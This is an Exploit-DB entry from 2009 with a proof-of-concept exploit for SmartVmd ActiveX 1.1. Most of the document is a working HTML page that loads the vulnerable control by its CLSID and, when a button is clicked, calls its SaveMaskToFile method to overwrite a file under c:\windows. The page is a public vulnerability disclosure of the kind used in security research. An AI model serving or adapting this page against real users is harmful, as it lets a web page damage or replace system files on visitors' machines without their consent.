SmartVmd ActiveX 1.1 - Remote File Overwrite Exploit

2009-01-19T00:00:00
ID EDB-ID:7826
Type exploitdb
Reporter Houssamix
Modified 2009-01-19T00:00:00

Description

SmartVmd ActiveX v 1.1 Remote File Overwrite Exploit. Remote exploit for windows platform

                                        
                                            <HTML>
<BODY>

<b>   
	Author : Houssamix    <br/>  <br/>  <br/>

   	SmartVmd ActiveX v 1.1 remote File Overwrite Exploit   <br/>

	download : http://www.smartvmd.com/setup/SetupActiveXVmd.msi  <br/>
<b/>


<object id=hsmx classid="clsid:{E3462D53-47A6-11D8-8EF6-DAE89272743C}"></object>

<SCRIPT>
/*

Report for Clsid: {E3462D53-47A6-11D8-8EF6-DAE89272743C}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe:  Safe for untrusted: caller  

*/
function hehe()
 {
     File = "c:\\windows\\system_.ini"
   hsmx.SaveMaskToFile(File)
 }

</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>

# milw0rm.com [2009-01-19]